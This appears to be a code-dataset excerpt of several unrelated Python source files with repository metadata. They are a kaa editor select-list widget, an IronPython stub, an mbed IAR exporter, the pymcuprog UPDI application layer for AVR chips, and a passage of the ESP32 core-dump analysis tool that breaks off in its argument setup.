2021-12-03T14:34:23.000Z
|
kaa/ui/selectlist/selectlist.py
|
tnhung2011/kaa
|
e6a8819a5ecba04b7db8303bd5736b5a7c9b822d
|
[
"Unlicense"
] | 34
|
2015-02-09T08:13:05.000Z
|
2021-04-08T08:19:05.000Z
|
kaa/ui/selectlist/selectlist.py
|
tnhung2011/kaa
|
e6a8819a5ecba04b7db8303bd5736b5a7c9b822d
|
[
"Unlicense"
] | 15
|
2015-05-21T07:41:17.000Z
|
2021-10-16T13:33:22.000Z
|
import collections
from kaa import document
from kaa.ui.dialog import dialogmode
from kaa.keyboard import *
from kaa.command import commandid, norec, norerun
SelectItem = collections.namedtuple(
'SelectItem', ['style', 'activestyle', 'text', 'value'])
selectlist_keys = {
down: 'selectitemlist.next',
(ctrl, 'n'): 'selectitemlist.next',
(ctrl, 'f'): 'selectitemlist.next',
tab: 'selectitemlist.next',
up: 'selectitemlist.prev',
(ctrl, 'p'): 'selectitemlist.prev',
(ctrl, 'b'): 'selectitemlist.prev',
(shift, tab): 'selectitemlist.prev',
}
class SelectItemList(dialogmode.DialogMode):
USE_UNDO = False
NO_WRAPINDENT = False
CAPTION_STYLE = 'caption'
items = ()
cursel = None
filterfunc = None
caption = None
SEP = ' '
@classmethod
def build(cls):
doc = document.Document()
mode = cls()
doc.setmode(mode)
return doc
def is_cursor_visible(self):
return 0 # hide cursor
def init_keybind(self):
super().init_keybind()
self.keybind.add_keybind(selectlist_keys)
def on_str(self, wnd, s, overwrite=False):
pass
def calc_height(self, wnd):
height = wnd.screen.get_total_height(wnd.mainframe.height // 2)
return height
def update_doc(self, items):
self.items = list(collections.OrderedDict((i, 1)
for i in items).keys())
self.cursel = None
self.document.marks.clear()
self.document.delete(0, self.document.endpos())
with dialogmode.FormBuilder(self.document) as f:
if self.caption:
f.append_text(self.CAPTION_STYLE, self.caption + ':\n')
for n, item in enumerate(self.items):
f.append_text(item.style, item.text, mark_pair=item)
if n != (len(self.items) - 1):
f.append_text('default', self.SEP)
def _update_item_style(
self, wnd, item, activate, middle=None, bottom=None):
if item not in self.document.marks:
return
if activate:
style = item.activestyle
else:
style = item.style
f, t = self.document.marks[item]
self.document.setstyles(f, t, self.get_styleid(style))
if activate:
wnd.screen.apply_updates()
top = not middle and not bottom
wnd.screen.locate(f, top=top, middle=middle, bottom=bottom)
wnd.update_window()
def update_sel(self, wnd, newsel, middle=None, bottom=None):
if self.cursel is not None:
self._update_item_style(wnd, self.cursel, False)
if newsel is not None:
self._update_item_style(wnd, newsel, True,
middle=middle, bottom=bottom)
self.cursel = newsel
@commandid('selectitemlist.next')
@norec
@norerun
def sel_next(self, wnd):
if not self.items:
newsel = None
elif self.cursel is None:
newsel = self.items[0]
else:
try:
idx = self.items.index(self.cursel)
except ValueError:
newsel = self.items[0]
else:
if idx < len(self.items) - 1:
newsel = self.items[idx + 1]
else:
newsel = self.items[0]
self.update_sel(wnd, newsel, bottom=True)
return newsel
@commandid('selectitemlist.prev')
@norec
@norerun
def sel_prev(self, wnd):
bottom = None
if not self.items:
newsel = None
elif self.cursel is None:
newsel = self.items[-1]
bottom = True
else:
try:
idx = self.items.index(self.cursel)
except ValueError:
newsel = self.items[-1]
bottom = True
else:
if idx > 0:
newsel = self.items[idx - 1]
else:
newsel = self.items[-1]
bottom = True
self.update_sel(wnd, newsel, bottom=bottom)
return newsel
| 28.493243
| 73
| 0.548968
|
a09c04da72c10679bbb1107e5106397be30deb15
| 1,303
|
py
|
Python
|
release/stubs.min/System/Drawing/Configuration.py
|
tranconbv/ironpython-stubs
|
a601759e6c6819beff8e6b639d18a24b7e351851
|
[
"MIT"
] | null | null | null |
release/stubs.min/System/Drawing/Configuration.py
|
tranconbv/ironpython-stubs
|
a601759e6c6819beff8e6b639d18a24b7e351851
|
[
"MIT"
] | null | null | null |
release/stubs.min/System/Drawing/Configuration.py
|
tranconbv/ironpython-stubs
|
a601759e6c6819beff8e6b639d18a24b7e351851
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# module System.Drawing.Configuration calls itself Configuration
# from System.Drawing,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a
# by generator 1.145
# no doc
# no imports
# no functions
# classes
class SystemDrawingSection(ConfigurationSection):
""" SystemDrawingSection() """
def Instance(self):
""" This function has been arbitrarily put into the stubs"""
return SystemDrawingSection()
BitmapSuffix=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: BitmapSuffix(self: SystemDrawingSection) -> str
Set: BitmapSuffix(self: SystemDrawingSection)=value
"""
ElementProperty=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the System.Configuration.ConfigurationElementProperty object that represents the System.Configuration.ConfigurationElement object itself.
"""
EvaluationContext=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the System.Configuration.ContextInformation object for the System.Configuration.ConfigurationElement object.
"""
HasContext=property(lambda self: object(),lambda self,v: None,lambda self: None)
Properties=property(lambda self: object(),lambda self,v: None,lambda self: None)
| 33.410256
| 148
| 0.753645
|
e07d7d992629943db97eaa0fbf1f57112ff004b7
| 6,252
|
py
|
Python
|
mbed-os/tools/export/iar/__init__.py
|
ghsecuritylab/BLEClient_mbedDevConn_Watson
|
f162ec8a99ab3b21cee28aaed65da60cf5dd6618
|
[
"Apache-2.0"
] | 1
|
2019-05-28T04:54:23.000Z
|
2019-05-28T04:54:23.000Z
|
mbed-os/tools/export/iar/__init__.py
|
ghsecuritylab/BLEClient_mbedDevConn_Watson
|
f162ec8a99ab3b21cee28aaed65da60cf5dd6618
|
[
"Apache-2.0"
] | 1
|
2017-02-20T10:48:02.000Z
|
2017-02-21T11:34:16.000Z
|
mbed-os/tools/export/iar/__init__.py
|
ghsecuritylab/BLEClient_mbedDevConn_Watson
|
f162ec8a99ab3b21cee28aaed65da60cf5dd6618
|
[
"Apache-2.0"
] | 3
|
2017-02-07T15:06:06.000Z
|
2021-02-19T13:56:31.000Z
|
import os
from os.path import sep, join, exists
from collections import namedtuple
from subprocess import Popen, PIPE
import shutil
import re
import sys
from tools.targets import TARGET_MAP
from tools.export.exporters import Exporter
import json
from tools.export.cmsis import DeviceCMSIS
from multiprocessing import cpu_count
class IAR(Exporter):
NAME = 'iar'
TOOLCHAIN = 'IAR'
#iar_definitions.json location
def_loc = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', '..', '..',
'tools','export', 'iar', 'iar_definitions.json')
#create a dictionary of the definitions
with open(def_loc, 'r') as f:
IAR_DEFS = json.load(f)
#supported targets have a device name and corresponding definition in
#iar_definitions.json
TARGETS = [target for target, obj in TARGET_MAP.iteritems()
if hasattr(obj, 'device_name') and
obj.device_name in IAR_DEFS.keys() and "IAR" in obj.supported_toolchains
and DeviceCMSIS.check_supported(target)]
SPECIAL_TEMPLATES = {
'rz_a1h' : 'iar/iar_rz_a1h.ewp.tmpl',
'nucleo_f746zg' : 'iar/iar_nucleo_f746zg.ewp.tmpl'
}
def iar_groups(self, grouped_src):
"""Return a namedtuple of group info
Positional Arguments:
grouped_src: dictionary mapping a group(str) to sources
within it (list of file names)
Relevant part of IAR template
{% for group in groups %}
<group>
<name>group.name</name>
{% for file in group.files %}
<file>
<name>$PROJ_DIR${{file}}</name>
</file>
{% endfor %}
</group>
{% endfor %}
"""
IARgroup = namedtuple('IARgroup', ['name','files'])
groups = []
for name, files in grouped_src.items():
groups.append(IARgroup(name,files))
return groups
def iar_device(self):
"""Retrieve info from iar_definitions.json"""
device_name = TARGET_MAP[self.target].device_name
device_info = self.IAR_DEFS[device_name]
iar_defaults ={
"OGChipSelectEditMenu": "",
"CoreVariant": '',
"GFPUCoreSlave": '',
"GFPUCoreSlave2": 40,
"GBECoreSlave": 35
}
iar_defaults.update(device_info)
IARdevice = namedtuple('IARdevice', iar_defaults.keys())
return IARdevice(**iar_defaults)
def format_file(self, file):
"""Make IAR compatible path"""
return join('$PROJ_DIR$',file)
def format_src(self, srcs):
"""Group source files"""
grouped = self.group_project_files(srcs)
for group, files in grouped.items():
grouped[group] = [self.format_file(src) for src in files]
return grouped
def get_ewp_template(self):
return self.SPECIAL_TEMPLATES.get(self.target.lower(), 'iar/ewp.tmpl')
def generate(self):
"""Generate the .eww, .ewd, and .ewp files"""
srcs = self.resources.headers + self.resources.s_sources + \
self.resources.c_sources + self.resources.cpp_sources + \
self.resources.objects + self.resources.libraries
flags = self.flags
flags['c_flags'] = list(set(flags['common_flags']
+ flags['c_flags']
+ flags['cxx_flags']))
if '--vla' in flags['c_flags']:
flags['c_flags'].remove('--vla')
if '--no_static_destruction' in flags['c_flags']:
flags['c_flags'].remove('--no_static_destruction')
#Optimizations
if '-Oh' in flags['c_flags']:
flags['c_flags'].remove('-Oh')
ctx = {
'name': self.project_name,
'groups': self.iar_groups(self.format_src(srcs)),
'linker_script': self.format_file(self.resources.linker_script),
'include_paths': [self.format_file(src) for src in self.resources.inc_dirs],
'device': self.iar_device(),
'ewp': sep+self.project_name + ".ewp",
'debugger': DeviceCMSIS(self.target).debug.replace('-','').upper()
}
ctx.update(flags)
self.gen_file('iar/eww.tmpl', ctx, self.project_name+".eww")
self.gen_file('iar/ewd.tmpl', ctx, self.project_name + ".ewd")
self.gen_file(self.get_ewp_template(), ctx, self.project_name + ".ewp")
@staticmethod
def build(project_name, log_name="build_log.txt", cleanup=True):
""" Build IAR project """
# > IarBuild [project_path] -build [project_name]
proj_file = project_name + ".ewp"
cmd = ["IarBuild", proj_file, '-build', project_name]
# IAR does not support a '0' option to automatically use all
# available CPUs, so we use Python's multiprocessing library
# to detect the number of CPUs available
cpus_available = cpu_count()
jobs = cpus_available if cpus_available else None
# Only add the parallel flag if we're using more than one CPU
if jobs:
cmd += ['-parallel', str(jobs)]
# Build the project
p = Popen(cmd, stdout=PIPE, stderr=PIPE)
out, err = p.communicate()
ret_code = p.returncode
out_string = "=" * 10 + "STDOUT" + "=" * 10 + "\n"
out_string += out
out_string += "=" * 10 + "STDERR" + "=" * 10 + "\n"
out_string += err
if ret_code == 0:
out_string += "SUCCESS"
else:
out_string += "FAILURE"
print out_string
if log_name:
# Write the output to the log file
with open(log_name, 'w+') as f:
f.write(out_string)
# Cleanup the exported and built files
if cleanup:
os.remove(project_name + ".ewp")
os.remove(project_name + ".ewd")
os.remove(project_name + ".eww")
# legacy output file location
if exists('.build'):
shutil.rmtree('.build')
if exists('BUILD'):
shutil.rmtree('BUILD')
if ret_code !=0:
# Seems like something went wrong.
return -1
else:
return 0
| 34.927374
| 88
| 0.580294
|
cf08de47d09ec22209a3aab1f70c911b7720cd5d
| 12,547
|
py
|
Python
|
pymcuprog/serialupdi/application.py
|
KrystianD-contribution/pymcuprog
|
a9411a8e4a5db8b54517c51da0bae96bf8385a65
|
[
"MIT"
] | 28
|
2021-05-08T19:28:33.000Z
|
2022-03-23T06:23:13.000Z
|
pymcuprog/serialupdi/application.py
|
KrystianD-contribution/pymcuprog
|
a9411a8e4a5db8b54517c51da0bae96bf8385a65
|
[
"MIT"
] | 20
|
2021-05-24T19:20:39.000Z
|
2022-03-12T20:10:30.000Z
|
pymcuprog/serialupdi/application.py
|
KrystianD-contribution/pymcuprog
|
a9411a8e4a5db8b54517c51da0bae96bf8385a65
|
[
"MIT"
] | 11
|
2021-06-24T20:59:16.000Z
|
2022-03-23T23:59:38.000Z
|
"""
Application layer for UPDI stack
"""
from logging import getLogger
from pymcuprog.pymcuprog_errors import PymcuprogError
from . import constants
from .link import UpdiDatalink16bit, UpdiDatalink24bit
from .nvm import NvmUpdi, NvmUpdiV0, NvmUpdiAvrV2, NvmUpdiAvrV3
from .readwrite import UpdiReadWrite
from .physical import UpdiPhysical
from .timeout import Timeout
def decode_sib(sib):
"""
Turns the SIB into something readable
:param sib: SIB data to decode
"""
sib_info = {}
logger = getLogger(__name__)
# Do some simple checks:
try:
# SIB should contain only ASCII characters
sib_string = sib.decode('ascii')
except UnicodeDecodeError:
logger.error("SIB read returned invalid characters")
return None
# Vital information is stored in the first 19 characters
if len(sib_string) < 19:
logger.error("SIB read returned incomplete string")
return None
logger.info("SIB: '%s'", sib_string)
# Parse fixed width fields according to spec
family = sib[0:7].strip().decode()
logger.info("Device family ID: '%s'", family)
sib_info['family'] = family
nvm = sib[8:11].strip().decode()
logger.info("NVM interface: '%s'", nvm)
sib_info['NVM'] = nvm.split(':')[1]
ocd = sib[11:14].strip().decode()
logger.info("Debug interface: '%s'", ocd)
sib_info['OCD'] = ocd.split(':')[1]
osc = sib[15:19].strip().decode()
logger.info("PDI oscillator: '%s'", osc)
sib_info['OSC'] = osc
extra = sib[19:].strip().decode()
logger.info("Extra info: '%s'", extra)
sib_info['extra'] = extra
return sib_info
class UpdiApplication:
"""
Generic application layer for UPDI
"""
def __init__(self, serialport, baud, device=None):
self.logger = getLogger(__name__)
self.device = device
# Build the UPDI stack:
# Create a physical
self.phy = UpdiPhysical(serialport, baud)
# Create a DL - use 16-bit until otherwise known
datalink = UpdiDatalink16bit()
# Set the physical for use in the datalink
datalink.set_physical(self.phy)
# Init (active) the datalink
datalink.init_datalink()
# Create a read write access layer using this data link
self.readwrite = UpdiReadWrite(datalink)
# Create an NVM driver
self.nvm = NvmUpdi(self.readwrite, self.device)
def read_device_info(self):
"""
Reads out device information from various sources
"""
sib = self.readwrite.read_sib()
sib_info = decode_sib(sib)
# Unable to read SIB?
if sib_info is None:
self.logger.warning("Unable to read SIB from device; attempting double-break recovery...")
# Send double break and try again
self.phy.send_double_break()
sib = self.readwrite.read_sib()
sib_info = decode_sib(sib)
if sib_info is None:
self.logger.error("Double-break recovery failed. Unable to contact device.")
raise PymcuprogError("Failed to read device info.")
# Select correct NVM driver:
# P:0 = tiny0, mega0 (16-bit, page oriented)
# P:1 = N/A
# P:2 = AVR DA, DB, DD (24-bit, word-oriented)
# P:3 = AVR EA (16-bit, page oriented)
if sib_info['NVM'] == '0':
self.logger.info("NVM type 0: 16-bit, page oriented write")
# DL is correctly configured already
# Create new NVM driver
self.nvm = NvmUpdiV0(self.readwrite, self.device)
elif sib_info['NVM'] == '2':
# This is a Dx-family member, and needs new DL and NVM
self.logger.info("NVM type 2: 24-bit, word oriented write")
# Create new DL
datalink = UpdiDatalink24bit()
# Use the existing PHY
datalink.set_physical(self.phy)
# And re-init
datalink.init_datalink()
# Create a read write access layer using this data link
self.readwrite = UpdiReadWrite(datalink)
# Create new NVM driver
self.nvm = NvmUpdiAvrV2(self.readwrite, self.device)
elif sib_info['NVM'] == '3':
self.logger.info("NVM type 3: 16-bit, page oriented")
# DL is correctly configured already
# Create new NVM driver
self.nvm = NvmUpdiAvrV3(self.readwrite, self.device)
else:
self.logger.error("Unsupported NVM revision - update pymcuprog.")
self.logger.info("PDI revision = 0x%02X", self.readwrite.read_cs(constants.UPDI_CS_STATUSA) >> 4)
if self.in_prog_mode():
if self.device is not None:
devid = self.read_data(self.device.sigrow_address, 3)
devrev = self.read_data(self.device.syscfg_address + 1, 1)
self.logger.info("Device ID from pyupdi = '%02X%02X%02X' rev '%s'", devid[0], devid[1], devid[2],
chr(ord('A') + devrev[0]))
return sib_info
def read_data(self, address, size):
"""
Reads a number of bytes of data from UPDI
:param address: address to write to
:param size: number of bytes to read
"""
return self.readwrite.read_data(address, size)
def read_data_words(self, address, words):
"""
Reads a number of words of data from UPDI
:param address: address to write to
:param words: number of words to read
"""
return self.readwrite.read_data_words(address, words)
def write_data_words(self, address, data):
"""
Writes a number of words to memory
:param address: address to write to
:param data: data to write
"""
return self.readwrite.write_data_words(address, data)
def write_data(self, address, data):
"""
Writes a number of bytes to memory
:param address: address to write to
:param data: data to write
"""
return self.write_data(address, data)
def in_prog_mode(self):
"""
Checks whether the NVM PROG flag is up
"""
if self.readwrite.read_cs(constants.UPDI_ASI_SYS_STATUS) & (1 << constants.UPDI_ASI_SYS_STATUS_NVMPROG):
return True
return False
def wait_unlocked(self, timeout_ms):
"""
Waits for the device to be unlocked.
All devices boot up as locked until proven otherwise
:param timeout_ms: number of milliseconds to wait
"""
timeout = Timeout(timeout_ms)
while not timeout.expired():
if not self.readwrite.read_cs(constants.UPDI_ASI_SYS_STATUS) & (
1 << constants.UPDI_ASI_SYS_STATUS_LOCKSTATUS):
return True
self.logger.error("Timeout waiting for device to unlock")
return False
def wait_urow_prog(self, timeout_ms, wait_for_high):
"""
Waits for the device to be in user row write mode
User row is writeable on a locked device using this mechanism
:param timeout_ms: number of milliseconds to wait
:param wait_for_high: set True to wait for bit to go high; False to wait for low
"""
timeout = Timeout(timeout_ms)
while not timeout.expired():
status = self.readwrite.read_cs(constants.UPDI_ASI_SYS_STATUS)
if wait_for_high:
if status & (1 << constants.UPDI_ASI_SYS_STATUS_UROWPROG):
return True
else:
if not status & (1 << constants.UPDI_ASI_SYS_STATUS_UROWPROG):
return True
self.logger.error("Timeout waiting for device to enter UROW WRITE mode")
return False
def unlock(self):
"""
Unlock by chip erase
"""
# Put in the key
self.readwrite.write_key(constants.UPDI_KEY_64, constants.UPDI_KEY_CHIPERASE)
# Check key status
key_status = self.readwrite.read_cs(constants.UPDI_ASI_KEY_STATUS)
self.logger.debug("Key status = 0x%02X", key_status)
if not key_status & (1 << constants.UPDI_ASI_KEY_STATUS_CHIPERASE):
raise PymcuprogError("Key not accepted")
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
# And wait for unlock
if not self.wait_unlocked(500):
raise PymcuprogError("Failed to chip erase using key")
def write_user_row_locked_device(self, address, data):
"""
Writes data to the user row when the device is locked, using a key.
"""
# Put in the key
self.readwrite.write_key(constants.UPDI_KEY_64, constants.UPDI_KEY_UROW)
# Check key status
key_status = self.readwrite.read_cs(constants.UPDI_ASI_KEY_STATUS)
self.logger.debug("Key status = 0x%02X", key_status)
if not key_status & (1 << constants.UPDI_ASI_KEY_STATUS_UROWWRITE):
raise PymcuprogError("Key not accepted")
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
# Wait for mode to be entered
if not self.wait_urow_prog(500, wait_for_high=True):
raise PymcuprogError("Failed to enter urow write mode using key")
# At this point we can write one 'page' to the device, and have it transfered into the user row
# Transfer data
self.readwrite.write_data(address, data)
# Finalize
self.readwrite.write_cs(constants.UPDI_ASI_SYS_CTRLA,
(1 << constants.UPDI_ASI_SYS_CTRLA_UROW_FINAL) |
(1 << constants.UPDI_CTRLB_CCDETDIS_BIT))
# Wait for mode to be exited
if not self.wait_urow_prog(500, wait_for_high=False):
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
raise PymcuprogError("Failed to exit urow write mode")
# Clear status
self.readwrite.write_cs(constants.UPDI_ASI_KEY_STATUS,
(1 << constants.UPDI_ASI_KEY_STATUS_UROWWRITE) |
(1 << constants.UPDI_CTRLB_CCDETDIS_BIT))
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
def enter_progmode(self):
"""
Enters into NVM programming mode
"""
# First check if NVM is already enabled
if self.in_prog_mode():
self.logger.info("Already in NVM programming mode")
return True
self.logger.info("Entering NVM programming mode")
# Put in the key
self.readwrite.write_key(constants.UPDI_KEY_64, constants.UPDI_KEY_NVM)
# Check key status
key_status = self.readwrite.read_cs(constants.UPDI_ASI_KEY_STATUS)
self.logger.debug("Key status = 0x%02X", key_status)
if not key_status & (1 << constants.UPDI_ASI_KEY_STATUS_NVMPROG):
self.logger.error("Key status = 0x%02X", key_status)
raise IOError("Key not accepted")
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
# And wait for unlock
if not self.wait_unlocked(100):
raise IOError("Failed to enter NVM programming mode: device is locked")
# Check for NVMPROG flag
if not self.in_prog_mode():
raise IOError("Failed to enter NVM programming mode")
self.logger.debug("Now in NVM programming mode")
return True
def leave_progmode(self):
"""
Disables UPDI which releases any keys enabled
"""
self.logger.info("Leaving NVM programming mode")
self.reset(apply_reset=True)
self.reset(apply_reset=False)
self.readwrite.write_cs(constants.UPDI_CS_CTRLB,
(1 << constants.UPDI_CTRLB_UPDIDIS_BIT) | (1 << constants.UPDI_CTRLB_CCDETDIS_BIT))
def reset(self, apply_reset):
"""
Applies or releases an UPDI reset condition
:param apply_reset: True to apply, False to release
"""
if apply_reset:
self.logger.info("Apply reset")
self.readwrite.write_cs(constants.UPDI_ASI_RESET_REQ, constants.UPDI_RESET_REQ_VALUE)
else:
self.logger.info("Release reset")
self.readwrite.write_cs(constants.UPDI_ASI_RESET_REQ, 0x00)
| 34.949861
| 115
| 0.61441
|
00192650405c5d6fe5d1f6544212b973c6ed10b5
| 13,221
|
py
|
Python
|
components/espcoredump/espcoredump.py
|
mbrunnen/hal_espressif
|
4f2f7d18a5be962ad0c8bcb3e9fbe010d9df80ee
|
[
"Apache-2.0"
] | 7
|
2020-12-10T14:48:17.000Z
|
2022-03-09T14:58:06.000Z
|
components/espcoredump/espcoredump.py
|
mbrunnen/hal_espressif
|
4f2f7d18a5be962ad0c8bcb3e9fbe010d9df80ee
|
[
"Apache-2.0"
] | 24
|
2020-12-10T11:29:39.000Z
|
2022-03-21T16:18:12.000Z
|
components/espcoredump/espcoredump.py
|
mbrunnen/hal_espressif
|
4f2f7d18a5be962ad0c8bcb3e9fbe010d9df80ee
|
[
"Apache-2.0"
] | 16
|
2020-12-10T11:11:20.000Z
|
2022-02-22T12:59:19.000Z
|
#!/usr/bin/env python
#
# ESP32 core dump Utility
import argparse
import logging
import os
import subprocess
import sys
from shutil import copyfile
from construct import GreedyRange, Int32ul, Struct
from corefile import __version__, xtensa
from corefile.elf import TASK_STATUS_CORRECT, ElfFile, ElfSegment, ESPCoreDumpElfFile, EspTaskStatus
from corefile.gdb import EspGDB
from corefile.loader import ESPCoreDumpFileLoader, ESPCoreDumpFlashLoader
from pygdbmi.gdbcontroller import DEFAULT_GDB_TIMEOUT_SEC
IDF_PATH = os.getenv('IDF_PATH')
if not IDF_PATH:
sys.stderr.write('IDF_PATH is not found! Set proper IDF_PATH in environment.\n')
sys.exit(2)
sys.path.insert(0, os.path.join(IDF_PATH, 'components', 'esptool_py', 'esptool'))
try:
import esptool
except ImportError:
sys.stderr.write('esptool is not found!\n')
sys.exit(2)
if os.name == 'nt':
CLOSE_FDS = False
else:
CLOSE_FDS = True
def load_aux_elf(elf_path): # type: (str) -> (ElfFile, str)
"""
Loads auxiliary ELF file and composes GDB command to read its symbols.
"""
elf = None
sym_cmd = ''
if os.path.exists(elf_path):
elf = ElfFile(elf_path)
for s in elf.sections:
if s.name == '.text':
sym_cmd = 'add-symbol-file %s 0x%x' % (elf_path, s.addr)
return elf, sym_cmd
def core_prepare():
loader = None
core_filename = None
if not args.core:
# Core file not specified, try to read core dump from flash.
loader = ESPCoreDumpFlashLoader(args.off, port=args.port, baud=args.baud)
elif args.core_format != 'elf':
# Core file specified, but not yet in ELF format. Convert it from raw or base64 into ELF.
loader = ESPCoreDumpFileLoader(args.core, args.core_format == 'b64')
else:
# Core file is already in the ELF format
core_filename = args.core
# Load/convert the core file
if loader:
loader.create_corefile(exe_name=args.prog)
core_filename = loader.core_elf_file.name
if args.save_core:
# We got asked to save the core file, make a copy
copyfile(loader.core_elf_file.name, args.save_core)
return core_filename, loader
def dbg_corefile():
"""
Command to load core dump from file or flash and run GDB debug session with it
"""
rom_elf, rom_sym_cmd = load_aux_elf(args.rom_elf)
core_filename, loader = core_prepare()
p = subprocess.Popen(bufsize=0,
args=[args.gdb,
'--nw', # ignore .gdbinit
'--core=%s' % core_filename, # core file,
'-ex', rom_sym_cmd,
args.prog],
stdin=None, stdout=None, stderr=None,
close_fds=CLOSE_FDS)
p.wait()
print('Done!')
def info_corefile():
"""
Command to load core dump from file or flash and print it's data in user friendly form
"""
core_filename, loader = core_prepare()
exe_elf = ElfFile(args.prog)
core_elf = ESPCoreDumpElfFile(core_filename)
if exe_elf.e_machine != core_elf.e_machine:
raise ValueError('The arch should be the same between core elf and exe elf')
if core_elf.e_machine == ESPCoreDumpElfFile.EM_XTENSA:
exception_registers_info = xtensa.print_exc_regs_info
else:
raise NotImplementedError
extra_note = None
task_info = []
for seg in core_elf.note_segments:
for note_sec in seg.note_secs:
if note_sec.type == ESPCoreDumpElfFile.PT_EXTRA_INFO and 'EXTRA_INFO' in note_sec.name.decode('ascii'):
extra_note = note_sec
if note_sec.type == ESPCoreDumpElfFile.PT_TASK_INFO and 'TASK_INFO' in note_sec.name.decode('ascii'):
task_info_struct = EspTaskStatus.parse(note_sec.desc)
task_info.append(task_info_struct)
print('===============================================================')
print('==================== ESP32 CORE DUMP START ====================')
rom_elf, rom_sym_cmd = load_aux_elf(args.rom_elf)
gdb = EspGDB(args.gdb, [rom_sym_cmd], core_filename, args.prog, timeout_sec=args.gdb_timeout_sec)
extra_info = None
if extra_note:
extra_info = Struct('regs' / GreedyRange(Int32ul)).parse(extra_note.desc).regs
marker = extra_info[0]
if marker == ESPCoreDumpElfFile.CURR_TASK_MARKER:
print('\nCrashed task has been skipped.')
else:
task_name = gdb.get_freertos_task_name(marker)
print("\nCrashed task handle: 0x%x, name: '%s', GDB name: 'process %d'" % (marker, task_name, marker))
print('\n================== CURRENT THREAD REGISTERS ===================')
if extra_note and extra_info:
exception_registers_info(extra_info)
else:
print('Exception registers have not been found!')
print(gdb.run_cmd('info registers'))
print('\n==================== CURRENT THREAD STACK =====================')
print(gdb.run_cmd('bt'))
if task_info and task_info[0].task_flags != TASK_STATUS_CORRECT:
print('The current crashed task is corrupted.')
print('Task #%d info: flags, tcb, stack (%x, %x, %x).' % (task_info[0].task_index,
task_info[0].task_flags,
task_info[0].task_tcb_addr,
task_info[0].task_stack_start))
print('\n======================== THREADS INFO =========================')
print(gdb.run_cmd('info threads'))
# THREADS STACKS
threads, _ = gdb.get_thread_info()
for thr in threads:
thr_id = int(thr['id'])
tcb_addr = gdb.gdb2freertos_thread_id(thr['target-id'])
task_index = int(thr_id) - 1
task_name = gdb.get_freertos_task_name(tcb_addr)
gdb.switch_thread(thr_id)
print('\n==================== THREAD {} (TCB: 0x{:x}, name: \'{}\') ====================='
.format(thr_id, tcb_addr, task_name))
print(gdb.run_cmd('bt'))
if task_info and task_info[task_index].task_flags != TASK_STATUS_CORRECT:
print("The task '%s' is corrupted." % thr_id)
print('Task #%d info: flags, tcb, stack (%x, %x, %x).' % (task_info[task_index].task_index,
task_info[task_index].task_flags,
task_info[task_index].task_tcb_addr,
task_info[task_index].task_stack_start))
print('\n\n======================= ALL MEMORY REGIONS ========================')
print('Name Address Size Attrs')
merged_segs = []
core_segs = core_elf.load_segments
for sec in exe_elf.sections:
merged = False
for seg in core_segs:
if seg.addr <= sec.addr <= seg.addr + len(seg.data):
# sec: |XXXXXXXXXX|
# seg: |...XXX.............|
seg_addr = seg.addr
if seg.addr + len(seg.data) <= sec.addr + len(sec.data):
# sec: |XXXXXXXXXX|
# seg: |XXXXXXXXXXX...|
# merged: |XXXXXXXXXXXXXX|
seg_len = len(sec.data) + (sec.addr - seg.addr)
else:
# sec: |XXXXXXXXXX|
# seg: |XXXXXXXXXXXXXXXXX|
# merged: |XXXXXXXXXXXXXXXXX|
seg_len = len(seg.data)
merged_segs.append((sec.name, seg_addr, seg_len, sec.attr_str(), True))
core_segs.remove(seg)
merged = True
elif sec.addr <= seg.addr <= sec.addr + len(sec.data):
# sec: |XXXXXXXXXX|
# seg: |...XXX.............|
seg_addr = sec.addr
if (seg.addr + len(seg.data)) >= (sec.addr + len(sec.data)):
# sec: |XXXXXXXXXX|
# seg: |..XXXXXXXXXXX|
# merged: |XXXXXXXXXXXXX|
seg_len = len(sec.data) + (seg.addr + len(seg.data)) - (sec.addr + len(sec.data))
else:
# sec: |XXXXXXXXXX|
# seg: |XXXXXX|
# merged: |XXXXXXXXXX|
seg_len = len(sec.data)
merged_segs.append((sec.name, seg_addr, seg_len, sec.attr_str(), True))
core_segs.remove(seg)
merged = True
if not merged:
merged_segs.append((sec.name, sec.addr, len(sec.data), sec.attr_str(), False))
for ms in merged_segs:
print('%s 0x%x 0x%x %s' % (ms[0], ms[1], ms[2], ms[3]))
for cs in core_segs:
# core dump exec segments are from ROM, other are belong to tasks (TCB or stack)
if cs.flags & ElfSegment.PF_X:
seg_name = 'rom.text'
else:
seg_name = 'tasks.data'
print('.coredump.%s 0x%x 0x%x %s' % (seg_name, cs.addr, len(cs.data), cs.attr_str()))
if args.print_mem:
print('\n====================== CORE DUMP MEMORY CONTENTS ========================')
for cs in core_elf.load_segments:
# core dump exec segments are from ROM, other are belong to tasks (TCB or stack)
if cs.flags & ElfSegment.PF_X:
seg_name = 'rom.text'
else:
seg_name = 'tasks.data'
print('.coredump.%s 0x%x 0x%x %s' % (seg_name, cs.addr, len(cs.data), cs.attr_str()))
print(gdb.run_cmd('x/%dx 0x%x' % (len(cs.data) // 4, cs.addr)))
print('\n===================== ESP32 CORE DUMP END =====================')
print('===============================================================')
del gdb
print('Done!')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='espcoredump.py v%s - ESP32 Core Dump Utility' % __version__)
parser.add_argument('--port', '-p', default=os.environ.get('ESPTOOL_PORT', esptool.ESPLoader.DEFAULT_PORT),
help='Serial port device')
parser.add_argument('--baud', '-b', type=int,
default=os.environ.get('ESPTOOL_BAUD', esptool.ESPLoader.ESP_ROM_BAUD),
help='Serial port baud rate used when flashing/reading')
parser.add_argument('--gdb-timeout-sec', type=int, default=DEFAULT_GDB_TIMEOUT_SEC,
help='Overwrite the default internal delay for gdb responses')
common_args = argparse.ArgumentParser(add_help=False)
common_args.add_argument('--debug', '-d', type=int, default=3,
help='Log level (0..3)')
common_args.add_argument('--gdb', '-g', default='xtensa-esp32-elf-gdb',
help='Path to gdb')
common_args.add_argument('--core', '-c',
help='Path to core dump file (if skipped core dump will be read from flash)')
